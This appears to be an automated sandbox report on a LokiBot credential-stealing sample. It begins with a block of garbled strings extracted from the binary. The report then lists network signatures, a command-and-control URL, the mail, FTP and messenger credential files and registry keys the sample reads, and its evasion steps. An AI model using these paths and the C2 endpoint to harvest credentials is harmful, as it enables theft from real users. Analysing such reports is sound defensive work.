ZE3c
:(='
z)jPq
G<ro
LKX
AssemblyCopyrightAttribute
v2.0.50727
S.(?
O"1o
Pk=>J
C<p
Aa3~
)|kr
CreateDecryptor
.T+C
26 `
]5_J8
kt'*&
K!)~
b7H{y/
w8(S
sq:,
>|@~l
ye3|
VT;1
u4E>
K)s2
V_o,5
<iQw
5&`=n
Q/~8
VY'm
-$1uw
#GcxJ
UJKV<
ca4u\
D n$[0
cvx$
{riv
Ab-`
7IM&
Rie4
&z!6
b-8l
\F~t
9o]]
s?l9
H1?'
}QGZ5FO
*n qO^[
-OSf.
#f;s+
r}V6\
~&#b
.O-^_++
(2L;
SymmetricAlgorithm
z;@2
+: E
V'E(
;Z:&
f]n
K1{ ]
u) W*
VkuPu
"~hE
Doq.
C'Ur
ytxIxu
33~v
<Cd3
]'lk`
}Qs=
^#=;
&Q2kVd
y@s%
` qh
40""
System.Runtime.Serialization
Dw /`y
d$K-}a
5Gde
L40"
|%
>cSdMt
nh)B
4*2c?i
vVe_
luO`U/kQ
%WSt
v(.mq
#l
Pftp
}cM^
!,Te
VL2^
/?9
System.Runtime.InteropServices
lE=%I
e\.XD
8=Fx
65m%
27:
PF9Ui
T$rO
2;z]
)vem
f*6G
+9&eS
RD:z'o
Lcj
o"
r{XIO
E? 8
o!'a
System.Runtime.CompilerServices
SONO
RxDN]
CXM
@T{F
SuppressIldasmAttribute
#.NH
yM@\
Pnhq
x!4-
x {Q
5R2LF4t
,MX~
X(A %
&t{k
],,o
ES`Y
KN4.
G:u'
DQTT_
fxqG
>ti
d}q0$
1Eyo
`FNR
]g:\
hf4)
X?1P
T:" z
<=n
[g%e
W3F_
\@ "
Rh1)
bK"U>0
xL q
w|nlD
Y'Hj
\}rKB
fP[S
6TABP
%=|EA
\:l`
z f2
Ssr
V{r5
cl!q
jp.m
IDisposable
p Ic
=c(];YO
P\ X!
}-i]
^01;/l
? -`A
ZQr'shNif
]''P
ZxZ
Z|_X
iX[K{
eJB^)8_
cU;{
Sc|F
eGs R-
^>?<W
a%gy
AssemblyProductAttribute
VtWGK
b]qb
3>?}
wg;e
nV*M
ok{:
E{^5
&5R zi
<Module>
{i*Y
Sm;M0
V;~ </*
bC4cP
m~%j
t0v\
<<.a[(
D&6Y
7NMv'n5
#fo#
/er-?
-eZV
(_ ).
}H8!
k82
s 2AM
|h{0
#<)
c7[|.
7EL-7
(r)l
s{$rW
: 'ZS
BK&=
V6O}qbo
[Z#X
{:f>
O%jN
MAP=
g+~:v9
11'c
qzGrq
j(IM
gA zB
H&a?Jl
E^nx
:N3Q
$ms9
gRW
VL]V
a5:qu
5{2#
gBvBt<
a ~
IuL|6
DL_j,|8
* }:
q>u_
bhP{
vDv_
e*gk
jM[FT2qE-
MalwareDestroyer
s.r^
Onp'HYZJ
C)1xB
8Mi:f;
7<x6
5xhQz
` Lb
>hC*
Q}O|ed
ToString
Jhq@
:|ibm
5 s
LM}"
'l(c
Kx;_r9zX
h&$j
}1U
^kc
ldW}
)RM9
%vs
l!A*
P6xC06
!*^l
WDc.G
;Q~t
:U]m
p; ,5
M4q-
.- A
= XT
R\u
D)*>
zV7Y
System.Text
fn!W
&(_e
Ng2h
IR$
#fxAk
?tk}
%6B^ ~
y:A5C
LARZv
v!5wz
>qf>{T
Hz$k
.z>N
CPl9m`\
JRWE5
]J
"px~4
m81h
e"[yh
-)zW_U
+L5$$`
DMvB
?g Q
6Y +
k^f.E
Jo,&
%SVC
E=_<
rcPN
ypXv
Ea{}
Zcj/
"wdy\
Xo5Y
fd/dh5
Om k
wlQl
>sE'
kkmTuJi
CC E
&527>
# xs
RQK'gaQ
g 2}FX
g8r4-
1v_E0
\~UI
4;ZD
Bz%HC_
maV{
Y#D%
Create
$6*0
_j ^f
h^%`
E
{"<;?K
c_xo
%7*Kr)C
{Pkq
M{ik
gRwj
System.ComponentModel
GD#.+
s3<
eRi'
C07m
Gk4<!*1
/= k3
)!EN
X 2x
G;@S
Gk| G
T7g}W~
Qk[,b
*u^}'.
U#u/Av
#Qu6
znV.
Di_y
T{N:
f`.$
uF|q
c;%
%Ou?A{X
F^e3
][I
:rs!D
qCk
UH$@K`
8]Nq
V6{|
%!mp8
k'g-
m5"1V
$qU`5^
|X<p
<6>6;:
9liZ
Xg7^
System.Windows.Forms
Gp\%
GRB2]
}Qm&
7 M\
tH[u
e.#m
t+79
7Qv6
T:Z
T3}g
m Vd
v_3^
ZPDPB
8+j,#bl
?gTP
System.Drawing.Bitmap
f26605d4.Resources.resources
rhs=
uA[!
AssemblyConfigurationAttribute
WZq"/ d
PJ6c
iy@HKy
Array
1@OK
xS6;;
K1 ;3
ugD:
Pi-J
b5M_
wb3>
ZFtw
F-w5(q
j<aKq
0\:N
[5lL`(w!
6L!@N3o
J3'1
Rzh!\
wrQ6@
z[!"
S*D3-
5: I
!mNY-
7< :
#ZODc,
(H_OX
=&R
vN^u
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-08-31 05:29:55 | 2018-08-31 05:32:55 | 180 |
19 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN LokiBot User-Agent (Charon/Inferno)
- signature: ET TROJAN LokiBot Checkin
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M2
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Collects information to fingerprint the system
Severity: High
Confidence: High
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
- file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Creates a hidden or system file
Severity: High
Confidence: Medium
- file: C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
- file: C:\Users\Seven01\AppData\Roaming\E62877
Exhibits behavior characteristic of iSpy Keylogger
Severity: High
Confidence: Very High
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (476) called API GetSystemTimeAsFileTime 1102462 times
Deletes its original binary from disk
Severity: High
Confidence: Very High
Attempts to remove evidence of file being downloaded from the Internet
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.95, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00032400, virtual_size: 0x000323a4
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- http_version_old: HTTP traffic uses version 1.0
- suspicious_request: http://zeroxa.club/mem/fre.php
At least one IP Address, Domain, or File Name was found in a crypto call
Severity: Medium
Confidence: Very High
- ioc: m4.rr
- ioc: ..glu
- ioc: s.l5
- ioc: l.er
- ioc: v.p0G
- ioc: ..o2
- ioc: 1.xb
- ioc: 3.0g
- ioc: u.ky
- ioc: 0.le
- ioc: t.wx
- ioc: e8.zgh
- ioc: 1d.6c
- ioc: j.x2
- ioc: n.cp
- ioc: u.ba
- ioc: p.b5
- ioc: 1.73
- ioc: y4.kuYS
- ioc: i0.42
- ioc: z.h4
- ioc: w.3hn
- ioc: 4.8r
- ioc: 2.4oL
- ioc: 0.yx
- ioc: 2.7h
- ioc: x.9mK
- ioc: f.w3
- ioc: j.gk
- ioc: u4.bh
- ioc: 6.n062
- ioc: a.8p
- ioc: g.li
- ioc: .7.as
- ioc: x.gr
- ioc: h.mq
- ioc: y.0h
- ioc: y.0f
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionAndSpinCount
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: msvcrt.dll/_set_error_mode
- DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
- DynamicLoader: msvcrt.dll/_get_terminate
- DynamicLoader: KERNEL32.dll/FindActCtxSectionStringW
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: mscorwks.dll/SetLoadedByMscoree
- DynamicLoader: mscorwks.dll/_CorExeMain
- DynamicLoader: mscorwks.dll/GetCLRFunction
- DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
- DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
- DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
- DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
- DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
- DynamicLoader: ADVAPI32.dll/TraceEvent
- DynamicLoader: MSCOREE.DLL/IEE
- DynamicLoader: mscoreei.dll/IEE_RetAddr
- DynamicLoader: mscoreei.dll/IEE
- DynamicLoader: mscorwks.dll/IEE
- DynamicLoader: MSCOREE.DLL/GetStartupFlags
- DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
- DynamicLoader: mscoreei.dll/GetStartupFlags
- DynamicLoader: MSCOREE.DLL/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
- DynamicLoader: mscoreei.dll/GetCORVersion
- DynamicLoader: MSCOREE.DLL/GetCORSystemDirectory
- DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: ntdll.dll/RtlUnwind
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/AddVectoredContinueHandler
- DynamicLoader: KERNEL32.dll/RemoveVectoredContinueHandler
- DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/GetWriteWatch
- DynamicLoader: KERNEL32.dll/ResetWriteWatch
- DynamicLoader: KERNEL32.dll/CreateMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryMemoryResourceNotification
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/CryptCreateHash
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptHashData
- DynamicLoader: ADVAPI32.dll/CryptGetHashParam
- DynamicLoader: ADVAPI32.dll/CryptImportKey
- DynamicLoader: ADVAPI32.dll/CryptExportKey
- DynamicLoader: ADVAPI32.dll/CryptGenKey
- DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
- DynamicLoader: ADVAPI32.dll/CryptSignHashA
- DynamicLoader: ADVAPI32.dll/CryptGetProvParam
- DynamicLoader: ADVAPI32.dll/CryptGetUserKey
- DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
- DynamicLoader: MSCOREE.DLL/GetMetaDataInternalInterface
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface_RetAddr
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorwks.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorjit.dll/getJit
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: uxtheme.dll/IsAppThemed
- DynamicLoader: uxtheme.dll/IsAppThemedW
- DynamicLoader: KERNEL32.dll/CreateActCtx
- DynamicLoader: KERNEL32.dll/CreateActCtxA
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: USER32.dll/RegisterWindowMessage
- DynamicLoader: USER32.dll/RegisterWindowMessageW
- DynamicLoader: KERNEL32.dll/GetUserDefaultUILanguage
- DynamicLoader: KERNEL32.dll/SetErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: bcrypt.dll/BCryptGetFipsAlgorithmMode
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/EnumProcessModulesW
- DynamicLoader: psapi.dll/GetModuleInformation
- DynamicLoader: psapi.dll/GetModuleInformationW
- DynamicLoader: psapi.dll/GetModuleBaseName
- DynamicLoader: psapi.dll/GetModuleBaseNameW
- DynamicLoader: psapi.dll/GetModuleFileNameEx
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: ADVAPI32.dll/CryptAcquireContext
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: ADVAPI32.dll/CryptGetProvParam
- DynamicLoader: CRYPTSP.dll/CryptGetProvParam
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: KERNEL32.dll/lstrlen
- DynamicLoader: KERNEL32.dll/lstrlenW
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptContextAddRef
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptContextAddRef
- DynamicLoader: ADVAPI32.dll/CryptContextAddRef
- DynamicLoader: ADVAPI32.dll/CryptDuplicateKey
- DynamicLoader: CRYPTSP.dll/CryptDuplicateKey
- DynamicLoader: ADVAPI32.dll/CryptSetKeyParam
- DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptDecrypt
- DynamicLoader: CRYPTSP.dll/CryptDecrypt
- DynamicLoader: CRYPTSP.dll/CryptDestroyKey
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: KERNEL32.dll/DeleteFile
